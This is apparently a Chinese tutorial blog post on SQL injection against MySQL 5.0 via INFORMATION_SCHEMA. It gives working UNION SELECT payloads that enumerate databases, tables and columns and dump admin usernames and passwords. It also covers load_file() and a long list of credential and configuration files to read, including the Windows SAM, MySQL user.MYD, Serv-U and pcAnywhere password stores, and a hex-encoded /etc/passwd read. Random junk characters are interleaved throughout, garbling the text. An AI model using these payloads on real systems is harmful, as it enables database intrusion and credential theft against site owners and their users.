mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


4 }8 y1 F; n# I% q: s% s7 Q0 R2 b/ |, j
6 i4 p) N6 A0 v4 Z+ O, K' ?8 N5 }Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
9 V* Y9 u/ \8 V1 X, l中记录了Mysql中所有
9 v5 |2 j/ A% G: T存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
' \/ w8 L) G% K7 f# w3 M* l1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
4 \$ Q/ a, S% o|—字段：SCHEMA_NAME ->数据库名称
5 l0 _1 y: z3 s9 j3 b+ O/ v
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
2 G- n4 v, U4 p5 U|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
/ X8 W  Q8 o! {" a# p( D: g: {' G7 ?|—字段：TABLE_SCHEMA ->该字段所属数据库名
% K2 ^4 `: u( D" [9 t" x|—字段：TABLE_NAME ->存储所属表的名称
( i& `; ], G/ E' ?
|—字段：COLUMN_NAME ->该字段的名称
; F  Y5 L' ~1 ]: u& \
#########################################################################
  Z. ?$ u4 `. d# _##
. ?3 C$ T5 T1 {" t" t) ?0 _
0×001 获取系统信息:
4 z% f7 J% d6 t7 k2 X
, y$ l5 Q3 w" |, e* R8 {- tunion select 1,2,3,4,5,concat
0 ^! v7 m/ N+ t' L; n! P9 |(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
) a3 G1 ~4 l! w$ c7 f(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
  L8 J# k) t6 S  p% f# u7 x. m7 ~3 w
' |2 a0 S& a5 f  q3 S/*

5 K  V' B" b/ ?  v7 `/ C@@global.version_compile_os 获取系统版本
2 }- ]' {- j: h9 V/ ^
2 K/ N; r: j# t0 a: U# V@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
/ K+ `0 c4 V2 b3 X
5 z9 ?- M$ Z' W9 U# F$ H*/

######################################################################
5 {/ v4 r, E) U: v; Y. l
+ U9 p7 g( q* o8 j0×002 获取表名

; T) X4 p4 ?' k& o/ |' Tunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
& G  R( g' B, F9 zinformation_schema.tables where table_schema=0x67617264656e /*
0 M& s: _- `9 ]0 i- W. l
% S* b3 f. X3 N7 T1 Y2 q/*

) a8 |" Z6 P" @: @% c- n! ]0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
5 Q% ~" ?7 b+ b. D2 X( B4 I
*/
8 |! X. {4 Y) @- r+ l: `+ T; M8 M
4 P; i. b+ G# z, I' N######################################################################
0 Y+ f- n2 b1 h# h# T, b
" r4 Q( @, J. \4 T) a3 O6 C- y0 m0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
: c+ C# {( L* Finformation_schema.columns where table_name=0x61646d696e and

! R& j% x/ u) e# y* H( ^6 u
+ N0 V5 k% l7 C1 W1 Ttable_schema=0x67617264656e limit 1 /*
) V1 T6 i/ \/ F# D3 s( V3 V
* e6 H7 _. q4 k8 m: p1 W/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
1 I, }0 [, B5 E. O5 k5 |. M
0x67617264656e ->数据库名

*/
+ `/ A, Q2 P  @
#####################################################################

0×004 获取数据

8 S/ N  J( s9 Q% n; W' a' v4 Punion select 1,2,3
9 U0 n9 V' d1 t( L  T- h/ [3 s! U,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
  h# K" A, M' {. l$ J
% }# ]6 h, _8 |' }union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

# G$ Q: k2 T5 D- t7 V( ^/*
5 A  w8 ?; v$ H' T* i$ C
2 r: O7 x  T4 K7 ~" T$ O1 x0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
6 _+ z" l" u, g2 R3 ]4 q
*/

9 c. }0 c; w* `/ V& [
2 @( ~5 S9 N; U- J5 o) [6 ?7 x

9 j% G1 q2 a; _" L
顺便添加一些mysql注入时非常有用的一些东西
0 i1 l0 i8 T  ?
+ c1 d+ h4 ]4 r' S& R; v5 J简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
6 b$ D1 E" ^) @: d: b! W% E2:user()        用户名
2 r+ \7 F0 m8 m7 p3 H1 @. P3:current_user()  当前用户名
5 C4 d0 W# v2 D: f9 _8 v( D# N: U5 _% t; g4:session_user()连接数据库的用户名
' S' M' F6 V; g- D# b0 W) l5:database()    数据库名
: r3 {# P' E2 p5 Y" x: l* I6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
, y" w; Q5 H9 x4 q. ]- D" z+ S收集的一些路径：
; I% t0 e: ], K  s& k6 ?WINDOWS下:
7 n/ c$ d5 r8 W( e* ~c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
6 m4 r; ~6 o4 q4 k& Ic:/winnt/php.ini
3 h' D4 I: [9 b& @! w5 Fc:/winnt/my.ini
$ q* ?/ N% [4 J9 Q& ic:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
) T! n0 T, K: q* e9 f. g' z! r9 Z/ }+ Tc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
. e( b6 M4 M$ |/ Lc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
: q7 f; o3 p! S' i9 I3 u2 \- sc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
3 W7 C- s4 ?7 t- h. W4 i! l2 Qc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
+ U/ ]7 l- e6 S: V/ ?5 W& R' QC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
+ T" o$ |; {' T//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

, C0 i/ E4 O! P& I. V
. g! W" Q2 o# pc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
; i7 V/ w5 X& h% c: R, @d:\APACHE\Apache2\conf\httpd.conf
" E7 V: M& ^( r( cC:\Program Files\mysql\my.ini
, ?5 [9 c' k4 l1 T4 y& {c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

/ \) z4 A; Z* fLUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
* j1 @$ P8 \3 p/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
2 w% y( ]% d) s7 |9 k+ w) x/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
% ~, j3 a0 J1 |" ?1 A5 n/etc/rsyncd.conf //同步程序配置文件
3 F" S* r/ [3 t: h+ h- C0 X/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
2 L4 g% L4 T' D/ \# `( f1 O/etc/issue
/etc/issue.net
* _1 k( @- ~. e( M/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
6 }& `1 m. |7 B2 q2 k/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
8 L4 s! e6 N5 s% \/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
, m: i# b, x# s1 k/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
& J$ c% y9 r/ O2 t/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
7 D% {1 [" u/ n0 N+ I5 l* w" b/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
4 l# D. F( {3 [) {3 h上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
0 B- S  t& M8 i4 s5 ]+ H& c